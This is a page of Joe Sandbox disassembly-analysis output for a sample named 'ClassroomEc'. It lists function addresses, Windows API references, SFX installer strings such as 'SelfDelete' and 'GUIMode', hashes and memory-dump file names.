Instruction ID: 5069b4c95110466d0fb55280ad1cb76fd12b4af7d4137563321a3e40819b94a4
Opcode Fuzzy Hash: b91e02b8ef41da04909c88aade994b9e0b61dba7c52fbbec2575f125b76ea533
Instruction Fuzzy Hash: 1DE1C474E00219EFDB08DFA8DD95AEEBBB5FF88300F108259E505A7295CB74AD42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A4D0 Relevance: 16.6, APIs: 11, Instructions: 105COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00A7A4DC
GetWindowLongW.USER32(00000000), ref: 00A7A4E3
DefWindowProcW.USER32(?,?,?,?), ref: 00A7A502
CallWindowProcW.USER32(?,?,?,?,00000000), ref: 00A7A534
GetSystemMetrics.USER32(00000031), ref: 00A7A53F
GetSystemMetrics.USER32(00000032), ref: 00A7A54A

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: Window$MetricsProcSystem$CallLongParent
String ID:
API String ID: 2567644265-0
Opcode ID: f9dde4e054fef535a789f96bb5ed2155321e674a06dadfc498f3d80bba25010c
Instruction ID: f2b6ba9abb2e816110c9448c11e9f9b8a0ded15ff8aa795369a3af4e48c5476b
Opcode Fuzzy Hash: f9dde4e054fef535a789f96bb5ed2155321e674a06dadfc498f3d80bba25010c
Instruction Fuzzy Hash: 8241AA75A00209AFDB44CFE8DD88EEE7BB9BB4C311F148649F509A7294CB34E941CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A87330 Relevance: 15.1, APIs: 10, Instructions: 92COMMON

Download Yara Rule

APIs

Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8733A
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A87345
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A87350
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8735B
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A87366
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A87371
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8737C
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A87387
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A87392
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8739D

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: ProcessorVirtual$Concurrency::RootRoot::
String ID:
API String ID: 3936482309-0
Opcode ID: 30382dc69e5fbf3bce174492a72467cb88e27a62c99ef59bb35e038e791f01f9
Instruction ID: 4f199f673a18cec312e9a5dbafd56390783ecabf35b7b69903c422ceed94a9e0
Opcode Fuzzy Hash: 30382dc69e5fbf3bce174492a72467cb88e27a62c99ef59bb35e038e791f01f9
Instruction Fuzzy Hash: 3B419A74A00109DBCB08EFD8C6A5BADB7F2AF54308F648198D4066B342CB719F55EBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00A74510 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 370memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 00A7458E

Strings

SetEnvironment, xrefs: 00A7489A
R, xrefs: 00A747F6

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: AllocatorDebugHeap
String ID: R$SetEnvironment
API String ID: 571936431-1698439222
Opcode ID: 2a8ce9596df819198ef964d36b58981c1cca20e5cf634a8db14539da83ee45f2
Instruction ID: bea2055ecd669444d18c997385605eedfacd551c97bb5160880e8c0924f99cc9
Opcode Fuzzy Hash: 2a8ce9596df819198ef964d36b58981c1cca20e5cf634a8db14539da83ee45f2
Instruction Fuzzy Hash: 72E1A0B1D00148EBCF08EBE4ED919FEBB79AF59304F14C129F51A6B252EB305A05DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A76AB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A72CC0: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A72CCA

_DebugHeapAllocator.LIBCPMTD ref: 00A76ADE
Concurrency::details::VirtualProcessorRoot::~VirtualProcessorRoot.LIBCMTD ref: 00A76B07
Concurrency::details::VirtualProcessorRoot::~VirtualProcessorRoot.LIBCMTD ref: 00A76B59
_DebugHeapAllocator.LIBCPMTD ref: 00A76B7E
Concurrency::details::VirtualProcessorRoot::~VirtualProcessorRoot.LIBCMTD ref: 00A76BED

Strings

;!@Install@!UTF-8!, xrefs: 00A76B83
;!@InstallEnd@!, xrefs: 00A76BA1

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: ProcessorVirtual$Root$Concurrency::details::Root::~$AllocatorDebugHeap$Concurrency::Root::
String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 2885122008-372238525
Opcode ID: 37ae1ca4b779b7ddf196ae60ef1d4d4dd651382f8c370b7e8ac3de4314de43cf
Instruction ID: 08d791bff75c24aea2fb2e82fd8914bf6e801bd07ed31bf73e5e25979579ed05
Opcode Fuzzy Hash: 37ae1ca4b779b7ddf196ae60ef1d4d4dd651382f8c370b7e8ac3de4314de43cf
Instruction Fuzzy Hash: 82414771D00148AACF09FBA0EE92BEDBB78AF14304F54C168F45676192EF316B59C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A9E0 Relevance: 12.1, APIs: 8, Instructions: 119windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A79100: SendMessageW.USER32(00000000,?,00000000,000004B3), ref: 00A79120

GetWindowLongW.USER32(00000000,000004B5), ref: 00A7AA80
SetWindowLongW.USER32(00000000,000004B5,000000F0), ref: 00A7AAAC
GetSystemMenu.USER32(00000000,00000000,000004B4,00000000,000004B8,00000401,00000000,75300000,000004B8,00000001), ref: 00A7AADD
EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00A7AAF7
SetFocus.USER32(00000000,000004B4,000004B8,00000401,00000000,75300000,000004B8,00000001), ref: 00A7AB0B
IsWindow.USER32(00000000), ref: 00A7AB25
EnableWindow.USER32(00000000,00000002), ref: 00A7AB3C
ShowWindow.USER32(00000000,000004B5,00000000), ref: 00A7AB5D

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: Window$EnableLongMenu$FocusItemMessageSendShowSystem
String ID:
API String ID: 2770945220-0
Opcode ID: 4e3bef64a39925db0fe65341cc72f54ac5b617db9610c3eef581c678386e4445
Instruction ID: 84f1406ee25396a7076239a6f7779288c5b397aff6446a732f7f20b0cb61f353
Opcode Fuzzy Hash: 4e3bef64a39925db0fe65341cc72f54ac5b617db9610c3eef581c678386e4445
Instruction Fuzzy Hash: AD410D70B40209ABDB04EFA4DE5ABAEB375AB84701F10C129F21A7B2E1CF756D41CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00A798E0 Relevance: 12.1, APIs: 8, Instructions: 85COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00A798FA
GetSystemMetrics.USER32(0000003D), ref: 00A7990F
GetSystemMetrics.USER32(0000000B), ref: 00A79919
GetSystemMetrics.USER32(0000003E), ref: 00A79929
SelectObject.GDI32(00000000,?), ref: 00A79963
DrawTextW.USER32(00000000,00000000,000000FF,00000000,?), ref: 00A79984
SelectObject.GDI32(00000000,?), ref: 00A799C4
ReleaseDC.USER32(00000000,00000000), ref: 00A799D7

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: MetricsSystem$ObjectSelect$DrawReleaseText
String ID:
API String ID: 2466489532-0
Opcode ID: 41447bb3a1a3639308b56f91c2239d2bc3c22bd939f77dfca7634713a728748d
Instruction ID: ad3146d2b94a9f20c27f2335bd752cd61b0f8a712c47ba631dce0f6ae02d5997
Opcode Fuzzy Hash: 41447bb3a1a3639308b56f91c2239d2bc3c22bd939f77dfca7634713a728748d
Instruction Fuzzy Hash: 3A31BE75A00109EFDB04DFA8D998A9EBBB5FF48310F20C55AF919A7390CB359A41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A81810 Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 488COMMON

Download Yara Rule

APIs

Part of subcall function 00A841E0: ??3@YAXPAX@Z.MSVCRT ref: 00A841F5
Part of subcall function 00A841E0: ??2@YAPAXI@Z.MSVCRT ref: 00A8421A

Part of subcall function 00A84280: ??3@YAXPAX@Z.MSVCRT ref: 00A84295
Part of subcall function 00A84280: ??2@YAPAXI@Z.MSVCRT ref: 00A842AA

std::exception::exception.LIBCMTD ref: 00A818C2
std::exception::exception.LIBCMTD ref: 00A818CA

Strings

@, xrefs: 00A81A5F
@, xrefs: 00A81A85
!, xrefs: 00A81ABA
@, xrefs: 00A8194A

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: ??2@??3@std::exception::exception
String ID: !$@$@$@
API String ID: 1147900709-3902203808
Opcode ID: ee080df5fc63fe9e49dba22cc232b619f44909f807105bd0b0cbdc273ec5a8c7
Instruction ID: 226722792930e3982347f38cde68f7c38cb28dbf051fbdbe1d98ba1d41bf470e
Opcode Fuzzy Hash: ee080df5fc63fe9e49dba22cc232b619f44909f807105bd0b0cbdc273ec5a8c7
Instruction Fuzzy Hash: 2122D970D11118DFCB18EFA8C9A5BEDBBB6BF84304F148159E44A6B252DB306E46CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00A71760 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 319COMMON

Download Yara Rule

APIs

Part of subcall function 00A73880: lstrlenW.KERNEL32(00A717FC,?,?,00A717FC,?,00A996DC), ref: 00A73888
Part of subcall function 00A73880: lstrlenW.KERNEL32(?,?,00A717FC,?,00A996DC), ref: 00A73895
Part of subcall function 00A73880: _wcsnicmp.MSVCRT ref: 00A738AC

_wtol.MSVCRT(?), ref: 00A71A92

Strings

OverwriteMode, xrefs: 00A718E1
GUIMode, xrefs: 00A7193A
SelfDelete, xrefs: 00A71A02
MiscFlags, xrefs: 00A719A9
GUIFlags, xrefs: 00A71974

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: lstrlen$_wcsnicmp_wtol
String ID: GUIFlags$GUIMode$MiscFlags$OverwriteMode$SelfDelete
API String ID: 24125944-3877767935
Opcode ID: cff5401f6205dd16402a1c811b59e1fb00b043b628eed4ecb099f2b1246cbc2d
Instruction ID: 09f9291427aff71176e8a6da359ed35aa8cb04adb6439a59176a6bcb39bd1c66
Opcode Fuzzy Hash: cff5401f6205dd16402a1c811b59e1fb00b043b628eed4ecb099f2b1246cbc2d
Instruction Fuzzy Hash: 5DB15E70B40008EBCB18DB9CCE929BDB3F2AF80745F64C159F40AAB281E6759E91E755

Uniqueness

Uniqueness Score: -1.00%

Function 00A7ADF0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A7AE39
wsprintfW.USER32 ref: 00A7AE8C
_DebugHeapAllocator.LIBCPMTD ref: 00A7AECF
_DebugHeapAllocator.LIBCPMTD ref: 00A7AEF3

Part of subcall function 00A89450: _wmemmove.LIBCMTD ref: 00A8948E

Strings

0u, xrefs: 00A7AE53
%d%%, xrefs: 00A7AE83

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: AllocatorDebugHeap$Unothrow_t@std@@@__ehfuncinfo$??2@_wmemmovewsprintf
String ID: %d%%$0u
API String ID: 3297093599-3442222605
Opcode ID: ee1d7b60bd6a3739d8f9cd74b862f758a245f7d1995a23128eddacc18a1b5569
Instruction ID: 480795dd0d3c8b311e3ba7ee4d42d9bc1cd0d37c123ed955eccdbd969e319b8f
Opcode Fuzzy Hash: ee1d7b60bd6a3739d8f9cd74b862f758a245f7d1995a23128eddacc18a1b5569
Instruction Fuzzy Hash: A9314F71E10208BBDB04EBD4DD96EEEB379EB98300F10C159E1197B292DB70A905CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A6B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00A7A6CA
SHBrowseForFolderW.SHELL32(?), ref: 00A7A6F4
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A7A725
_DebugHeapAllocator.LIBCPMTD ref: 00A7A73B
SHGetMalloc.SHELL32(00000000), ref: 00A7A75C

Strings

A, xrefs: 00A7A6E3

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: AllocatorBrowseDebugFolderFromHeapListMallocPathmemset
String ID: A
API String ID: 1414482492-3554254475
Opcode ID: 13cd9e771d6b69ab593a0a71a92d6b2792aa2274e9878daf25129b608d406936
Instruction ID: 8c7592c42c84c0db3c46a014b79865714a827335b7e2a877161ec0735020b0ee
Opcode Fuzzy Hash: 13cd9e771d6b69ab593a0a71a92d6b2792aa2274e9878daf25129b608d406936
Instruction Fuzzy Hash: FD21CB70A4021D9BDB64EB54DD8CBD9B3B5AF98300F1081D9A50DA7260DB749EC5CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00A8B400 Relevance: 9.1, APIs: 6, Instructions: 57COMMON

Download Yara Rule

APIs

Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8B40A
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8B415
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8B420
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8B42B
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8B436
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A8B441

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: ProcessorVirtual$Concurrency::RootRoot::
String ID:
API String ID: 3936482309-0
Opcode ID: c84649eeb78ef2128d15dfdc8215ad4db7adab1b0e83806b9e995885cf6cc534
Instruction ID: b8f7417c96da7ffe6968f8acf85cdd95630cc833d4539c89344515067e1efebc
Opcode Fuzzy Hash: c84649eeb78ef2128d15dfdc8215ad4db7adab1b0e83806b9e995885cf6cc534
Instruction Fuzzy Hash: 7821B970A04108EBCB08EFD8C695B9EB7F1AF44308F648198D5052B342CB75AF11DBD6

Uniqueness

Uniqueness Score: -1.00%

Function 00A75870 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 00A75885

Part of subcall function 00A89450: _wmemmove.LIBCMTD ref: 00A8948E

Part of subcall function 00A89270: _wmemmove.LIBCMTD ref: 00A892A5

Part of subcall function 00A804F0: ??3@YAXPAX@Z.MSVCRT ref: 00A80505

_DebugHeapAllocator.LIBCPMTD ref: 00A758C3

Strings

%%T/, xrefs: 00A758D5
%%T, xrefs: 00A758FA
%%T\, xrefs: 00A75897

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: AllocatorDebugHeap_wmemmove$??3@
String ID: %%T$%%T/$%%T\
API String ID: 3527340311-3604420949
Opcode ID: 34d831abcfaa119da21ed88b2ef6909e40e68dd02f00fa36053d3701e04a2a1c
Instruction ID: 69943358477b15d02f8ea0f3dd716434a85d5d175f352dc3ee4a330e6111d66a
Opcode Fuzzy Hash: 34d831abcfaa119da21ed88b2ef6909e40e68dd02f00fa36053d3701e04a2a1c
Instruction Fuzzy Hash: E611A771960008BBCF08FFA4DE92DEEB378AE54700F40C55CB51726192EF706A09CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A759F0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 00A75A05

Part of subcall function 00A89450: _wmemmove.LIBCMTD ref: 00A8948E

Part of subcall function 00A89270: _wmemmove.LIBCMTD ref: 00A892A5

Part of subcall function 00A804F0: ??3@YAXPAX@Z.MSVCRT ref: 00A80505

_DebugHeapAllocator.LIBCPMTD ref: 00A75A43

Strings

%%M/, xrefs: 00A75A55
%%M, xrefs: 00A75A7A
%%M\, xrefs: 00A75A17

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: AllocatorDebugHeap_wmemmove$??3@
String ID: %%M$%%M/$%%M\
API String ID: 3527340311-1781175070
Opcode ID: 6d0618fca4522d31b718163de0f3251cf0003507dda31b955d2e0d088ca7c54b
Instruction ID: acfdbfd83f1c90da313f6b533e4ba2e4ba0d1a94e9e8af0ccb34a1b7af140a91
Opcode Fuzzy Hash: 6d0618fca4522d31b718163de0f3251cf0003507dda31b955d2e0d088ca7c54b
Instruction Fuzzy Hash: 6511A771960008BBDF08FBE4DE92DEEB378AE54700F44C55CB51726192EF706A49CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A75930 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 00A75945

Part of subcall function 00A89450: _wmemmove.LIBCMTD ref: 00A8948E

Part of subcall function 00A89270: _wmemmove.LIBCMTD ref: 00A892A5

Part of subcall function 00A804F0: ??3@YAXPAX@Z.MSVCRT ref: 00A80505

_DebugHeapAllocator.LIBCPMTD ref: 00A75983

Strings

%%S\, xrefs: 00A75957
%%S/, xrefs: 00A75995
%%S, xrefs: 00A759BA

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: AllocatorDebugHeap_wmemmove$??3@
String ID: %%S$%%S/$%%S\
API String ID: 3527340311-1963631775
Opcode ID: 49decf933e5914c9b8772d54afa086e8894a2c0d69770b8392e92fe2e451f707
Instruction ID: 7e56bced87c20f30c2cfb556253e64db9d2d7fcc3bdeea0e1869e6d674124a74
Opcode Fuzzy Hash: 49decf933e5914c9b8772d54afa086e8894a2c0d69770b8392e92fe2e451f707
Instruction Fuzzy Hash: 4B11A771960008BBCF08FBA4DE92DEEB378AE54700F40C55CB51736192EF706A09CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A95260 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00A952FF
memset.MSVCRT ref: 00A95318
memset.MSVCRT ref: 00A953A5
memset.MSVCRT ref: 00A953BE

Strings

&, xrefs: 00A95289

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: memset
String ID: &
API String ID: 2221118986-1010288
Opcode ID: 4a134deadddd27b75c2f87929b85d2cbcd596e30c9a30e45e571e3856727e1f5
Instruction ID: 1b5cf7aa5d137396257664312e1566b9f6817df1d57e4d0367e028944fa7ddd1
Opcode Fuzzy Hash: 4a134deadddd27b75c2f87929b85d2cbcd596e30c9a30e45e571e3856727e1f5
Instruction Fuzzy Hash: 41412A70E05208EFDF05CFA8C996BADBBB1BF54308F248198D9456B381D6719B44EB84

Uniqueness

Uniqueness Score: -1.00%

Function 00A93700 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A9370A
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A93715
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A93720
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A9372B
Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00A93736

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: ProcessorVirtual$Concurrency::RootRoot::
String ID:
